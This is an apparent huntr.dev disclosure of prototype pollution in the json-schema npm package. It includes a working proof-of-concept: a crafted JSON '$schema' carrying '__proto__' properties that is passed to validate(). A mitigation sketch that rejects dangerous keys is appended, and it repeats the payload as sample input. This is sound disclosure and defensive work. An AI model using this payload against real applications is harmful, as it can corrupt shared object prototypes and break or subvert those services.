huntr Yoshino-s BB6CCD63-F505-4E3A-B55F-CD2662C261A9
History Oct 03, 2021 - 1:08 p.m.

Prototype Pollution in kriszyp/json-schema

2021-10-03 13:08:43
yoshino-s
www.huntr.dev
32

EPSS: 0.005
Percentile: 75.6%

Description

A crafted payload passed to validate leads to prototype pollution.

Proof of Concept

// PoC.js
const { validate } = require("json-schema");
const instance = JSON.parse(`
{
  "$schema":{
    "type": "object",
    "properties":{
      "__proto__": {
        "type": "object",
        
        "properties":{
          "polluted": {
              "type": "string",
              "default": "polluted"
          }
        }
      }
    },
    "__proto__": {}
  }
}`);

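// A fresh object, created before validate() runs.
const a = {};
// Before the call: "polluted" is not defined on a or on its prototype chain.
console.log(a.polluted);
// The instance carries its own "$schema", which validate() processes.
validate(instance);
// After the call: the property is read again from the same untouched object.
console.log(a.polluted);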

Impact

This vulnerability can cause prototype pollution.
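
Mitigation sketch (an added example, not part of the original report and not code from the json-schema project): a guard that rejects parsed JSON carrying __proto__, constructor or prototype as own keys before it reaches validate. The function names, the key list and the sample input are assumptions made for illustration; the sample is constructed to match the shape of the PoC instance.

```javascript
// Added example: pre-validation guard (hypothetical helper names).
// Keys that can lead to Object.prototype when code copies or walks
// properties by name. The list is an assumption and is deliberately strict.
const DANGEROUS_KEYS = new Set(["__proto__", "constructor", "prototype"]);

// Walk own properties only and collect the path of every dangerous key.
// JSON.parse stores "__proto__" as an ordinary own property, so
// Object.keys() reports it. Input is assumed to come from JSON.parse
// (no cycles, plain objects and arrays only).
function findDangerousKeys(value, path = "", found = []) {
  if (value === null || typeof value !== "object") return found;
  for (const key of Object.keys(value)) {
    const childPath = `${path}/${key}`;
    if (DANGEROUS_KEYS.has(key)) found.push(childPath);
    findDangerousKeys(value[key], childPath, found);
  }
  return found;
}

// Refuse the input before it is handed to the validator.
function assertSafeForValidation(instance) {
  const hits = findDangerousKeys(instance);
  if (hits.length > 0) {
    throw new Error(`rejected keys: ${hits.join(", ")}`);
  }
  return instance;
}

// Constructed sample input with the same shape as the PoC instance.
const sample = JSON.parse(`{
  "$schema": {
    "type": "object",
    "properties": {
      "__proto__": {
        "type": "object",
        "properties": {
          "polluted": { "type": "string", "default": "polluted" }
        }
      }
    },
    "__proto__": {}
  }
}`);
```

Because the key list is strict, a legitimate schema that defines a property literally named constructor or prototype is also rejected; relax the list only after confirming the validator in use handles those keys safely.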